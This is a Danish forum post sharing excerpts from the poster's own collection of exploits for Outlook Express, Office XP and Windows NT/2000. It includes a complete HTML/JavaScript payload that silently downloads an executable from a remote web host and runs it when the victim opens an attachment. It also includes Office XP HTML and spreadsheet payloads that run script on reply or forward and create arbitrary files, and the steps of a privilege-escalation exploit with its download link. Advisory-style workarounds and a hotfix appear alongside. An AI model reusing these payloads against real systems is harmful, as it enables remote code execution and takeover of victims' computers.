Jamen det kan jeg da godt.
Nedenstående er klippet fra mit eget "hul dokument" og har er tale om forholdsvis nye og "gællende" huller og exploits. God læsning
"download&execution" of an .EXE file, directly from Outlook Express.
When an HTML page attached into a message, is started, it runs in the security zone of "\Temporary Internet Files" (TIF).
First: we can use the "dynsrc" trick of IMG tag to download an .EXE from the web - in a silent way - into TIF zone. NOTE: if we use "src", the browser does not recognize the image format (because it's an executable) and download it only in a partial way. Then - using javascript - we can get local path of "Temporary Internet Files" folder where the page was stored from Outlook Express and where the .EXE file will be downloaded.
NOTE: we must add "[1]" or "[2]" or "[x]" at the end of .EXE filename, because IE rename temporary downloaded files. Finally, using ".innerHTML" exploit and knowing the exact path of the executable, we can run the .EXE file using this interesting trick:
 if we use a path which contains the string "\Temporary Internet Files", IE will refuse to create ActiveX object for security restrictions and does not run the .EXE file;
 but if we use old-dos path (c:\windows\tempor~1\content.ie5) instead long path (c:\windows\temporary internet files\content.ie5), IE is fooled and run the .EXE file;
This is the JavaScript code for the HTML page (note: you must create an HTML file and attach it to e-mail message, this code does not work written directly inside the e-mail, the HTML page must be opened from Outlook Express)
The exploit is easy to create if page and executable have a similar name (for example EXPLOIT.HTML and EXPLOIT.EXE). The .EXE file must be uploaded into a web-site before.
NOTE: exploit is not an "automatic execution" of attachment, the victim must open the attached HTML page.
<HTML>
<SCRIPT LANGUAGE="JavaScript">
function runtimer()
{
//we must wait until .EXE file is copied to \Temporary Internet Files
timerID=setTimeout('runit()',7000)
}
function runit ()
{
//catch local path of .EXE file
var url = document.location.href;
var path1=url.substring(8,url.length-5)+"[1].exe";
//we need only the final path string
//it starts from /Content.IE5/xxyyzz/
i=0;
var found=false;
var path2="";
while(i<path1.length) {
if(path1.substring(i,i+2)=="/C") {found=true;}
if(found) {path2=path2+path1.substring(i,i+1);}
i++;
}
//this is the trick using dos name "Tempor~1" instead long names "Temporary Internet Files"
path2="C:/WINDOWS/Tempor~1"+path2;
alert("LOCAL PATH = "+path2);
//finally run it with help of .innerHTML
document.body.innerHTML = '<OBJECT NAME="X"
CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE='+path2+'></OBJECT>';
}
</SCRIPT>
<body onLoad="runtimer()">
<center>
<h3>OUTLOOK EXPRESS Temporary Internet Files Locate&Execution</h3>
<img src="_some_image.jpg" dynsrc="
http://web.tiscali.it/funkybus/exploit.exe"><hr>
<P>This page download (silently) an .EXE file using "IMG" tag
into "\Temporary Internet Files" folder, then locate the local path
of the .EXE using JavaScript and run it using .innerHtml exploit.</P>
<hr>
Exploit coded by Elia Florio
(eflorio@edmaster.it)
</center>
</body>
</html>
Vulnerabilities in Office XP.
1. It is possible to embed active content (object + script) in HTML mail which is triggered if the user choses reply or forward to the mail. This opens an exploit scenario for forcing the user to visit a page in the internet zone of IE at least.
2. There is a bug in ms spreadsheet compononent. Namely in its Host() function which may be exploited with the help of (1) or probably from any document opened with Office application. This buggy function allows creating files with arbitrary names and their content may be specified to some extent at which is sufficient to place an executable file (.hta) in user's startup directory which may lead to taking full control over user's computer. This probably may be called cross application scripting because one application uses object from another application.
Details:
The following must be put in HTML email which should be opened with Outlook XP and the user should chose reply or forward.
1.
--------------------------------------
<OBJECT id=WebBrowser1 height=150 width=300
classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>
<PARAM NAME="ExtentX" VALUE="7938">
<PARAM NAME="ExtentY" VALUE="3969">
<PARAM NAME="ViewMode" VALUE="0">
<PARAM NAME="Offline" VALUE="0">
<PARAM NAME="Silent" VALUE="0">
<PARAM NAME="RegisterAsBrowser" VALUE="1">
<PARAM NAME="RegisterAsDropTarget" VALUE="1">
<PARAM NAME="AutoArrange" VALUE="0">
<PARAM NAME="NoClientEdge" VALUE="0">
<PARAM NAME="AlignLeft" VALUE="0">
<PARAM NAME="ViewID" VALUE="{0057D0E0-3573-11CF-AE69-08002B2E1262}">
<PARAM NAME="Location" VALUE="about:/dev/random<script>while (42)
alert('HOHOHO\nTrying to sell trustworthy
computing\nHOHOHO')</script>">
<PARAM NAME="ReadyState" VALUE="4">
</OBJECT>
-------------------------------------
2.
The office spreadsheet component is something like mini excel. It may be embeded in web pages (seems not exploitable) and in office documents (seems exploitable).
It supports the Host() function which returns the hosting object. So if you put in formula '=Host().SaveAs("name")' file with name shall be created.
[Note, lines may be wrapped]
---------------------------------------
<h1>
Hehe. Triyng to sell trustworthy computing.
</h1>
<object
classid="CLSID:0002E551-0000-0000-C000-000000000046" id=Spreadsheet1
v:shapes="_x0000_s1026" class=shape width=81 height=81
u1:shapes="_x0000_s1025">
<param name=DataType value=XMLURL>
<param name=XMLData
value="<?xml version="1.0"?> <ss:Workbook
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:x="urn:schemas-microsoft-com:office:excel"
xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet"
xmlns:c="urn:schemas-microsoft-com:office:component:spreadsheet"&#
13;
xmlns:html="
http://www.w3.org/TR/REC-html40"> <x:ExcelWorkbook>
<x:ProtectStructure>False</x:ProtectStructure>
<x:ActiveSheet>0</x:ActiveSheet>
</x:ExcelWorkbook> <ss:Styles> <ss:Style
ss:ID="Default"> <ss:Alignment
ss:Horizontal="Automatic" ss:Rotate="0.0"
ss:Vertical="Bottom"
ss:ReadingOrder="Context"/>
<ss:Borders> </ss:Borders> <ss:Font
ss:FontName="Arial" ss:Size="10"
ss:Color="Automatic" ss:Bold="0"
ss:Italic="0"
ss:Underline="None"/> <ss:Interior
ss:Color="Automatic" ss:Pattern="None"/>
<ss:NumberFormat ss:Format="General"/>
<ss:Protection
ss:Protected="1"/> </ss:Style>
</ss:Styles> <c:ComponentOptions>
<c:Label> <c:Caption>Microsoft Office
Spreadsheet</c:Caption>
</c:Label> <c:PreventPropBrowser/>
<c:MaxHeight>80%</c:MaxHeight>
<c:MaxWidth>80%</c:MaxWidth>
<c:NextSheetNumber>1</c:NextSheetNumber>
</c:ComponentOptions> <x:WorkbookOptions>
<c:OWCVersion>10.0.0.2621 </c:OWCVersion>
<x:DisableUndo/> </x:WorkbookOptions>
<ss:Worksheet
ss:Name="Sheet1">
<x:WorksheetOptions> <x:Selected/>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions> </c:WorksheetOptions>
<ss:Table ss:ExpandedColumnCount="1"
ss:ExpandedRowCount="1"
ss:DefaultColumnWidth="48.0"
ss:DefaultRowHeight="12.75">
<ss:Row> <ss:Cell
ss:Formula='=HOST().SaveAs("C:\GGGG5")'>
<ss:Data ss:Type="Boolean">1</ss:Data>
</ss:Cell> </ss:Row>
</ss:Table> </ss:Worksheet> <ss:Worksheet
ss:Name="Sheet2">
<x:WorksheetOptions>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions> <c:WorksheetOptions>
</c:WorksheetOptions> </ss:Worksheet>
<ss:Worksheet ss:Name="Sheet3">
<x:WorksheetOptions>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions> <c:WorksheetOptions>
</c:WorksheetOptions> </ss:Worksheet>
<o:DocumentProperties>
<o:Author>ad</o:Author>
<o:LastAuthor>ad</o:LastAuthor>
<o:Created>2002-03-17T12:07:37Z</o:Created>
<o:Company>g</o:Company>
<o:Version>10.2625</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:DownloadComponents/>
<o:LocationOfComponents HRef="
file:///E:\"/> </o:OfficeDocumentSettings> </ss:Workbook> ">
<param name=AllowPropertyToolbox value=0>
<param name=AutoFit value=0>
<param name=Calculation value=-4105>
<param name=Caption value="Microsoft Office Spreadsheet">
<param name=DisplayColumnHeadings value=-1>
<param name=DisplayGridlines value=-1>
<param name=DisplayHorizontalScrollBar value=-1>
<param name=DisplayOfficeLogo value=-1>
<param name=DisplayPropertyToolbox value=0>
<param name=DisplayRowHeadings value=-1>
<param name=DisplayTitleBar value=0>
<param name=DisplayToolbar value=-1>
<param name=DisplayVerticalScrollBar value=-1>
<param name=DisplayWorkbookTabs value=-1>
<param name=EnableEvents value=-1>
<param name=MaxHeight value="80%">
<param name=MaxWidth value="80%">
<param name=MoveAfterReturn value=-1>
<param name=MoveAfterReturnDirection value=-4121>
<param name=RightToLeft value=0>
<param name=ScreenUpdating value=-1>
<param name=EnableUndo value=0>
</object>
---------------------------------
Workaround/Solution:
The solution is to get a real mail client and office applications. Workaround for this particular problem is:
For (1) - disable everything that contains "active" in IE.
For (2) - (Have not tested it personally) Deregister and delete the ms office spreadsheet component
Vendor status:
Microsoft was notified on 17 March 2002.
They had 2 weeks to produce a patch but didn't.
Regards,
Georgi Guninski
http://www.guninski.comLocal security vulnerability in windows NT and Windows 2000
Radim "EliCZ" Picha (Bugs@EliCZ.cjb.net) discovered a vulnerability in Windows NT 4.0 and Windows 2000. He has written an exploit called DebPloit that shows the weakness of a local Windows NT/2000 security and totally compromises entire security subsystem.
DebPloit uses a hole in the NT/2000 debugging subsystem and allows ANY user with ANY privileges (even Guest and Restricted user) to execute processes in the security context of an administrator or a local system (SYSTEM) account.
In other words, any person who have an access to the local computer can became an administrator and do everything he/she wants.
Principle: Ask the debugging subsystem (smss.exe) to duplicate a handle to Target (any process running on the local computer):
1. Become dbgss client (DbgUiConnectToDbg).
2. Connect to the DbgSsApiPort Local Procedure Call (LPC) port (ZwConnectPort). Everyone can access this port.
3. Ask dbgss to handle CreateProcess SsApi with Target's client id (ZwRequestPort).
4. Wait for dbgss to reply with CREATE_PROCESS_DEBUG_EVENT (WaitForDebugEvent). Message contains a duplicated handle.
5. Impersonate your security context using a duplicated handle.
6. Execute any code (e.g. run an external program) in the security context of Target.
Download DebPloit with a source code from
http://www.anticracking.sk/EliCZ/bugs/DebPloit.zipTo test your system for this vulnerability:
1. Download DebPloit.zip and unzip it to the directory on your hard drive.
2. Logoff and login again using Guest (or any other non-administrative account) account.
3. Run ERunAsX.exe from the command line and specify a program you wish to execute under the SYSTEM account (e.g. "ERunAsX.exe cmd").
4. Your program now runs under the SYSTEM account and you can do everything (e.g. create new user with an administrative privileges) on the local computer.
HOTFIX
To close this hole and protect your computers and network against attacks from the inside, you can use an unofficial hotfix released by SmartLine, Inc.
DebPloitFix is a hotfix that closes the security hole using by the DebPloit exploit. DebPloitFix is implemented as a kernel mode driver that can be run dinamically (no need to restart your system). DebPloitFix assigns the new security descriptor to the DbgSsApiPort LPC port so only the local system (SYSTEM user) will be able to access this port.
Download DebPloitFix with a source code from
http://www.smartline.ru/software/DebPloitFix.zipFor more information, please visit
http://www.ntutility.com/freeware.html
Ny bruger
Nybegynder
Opret
Preview
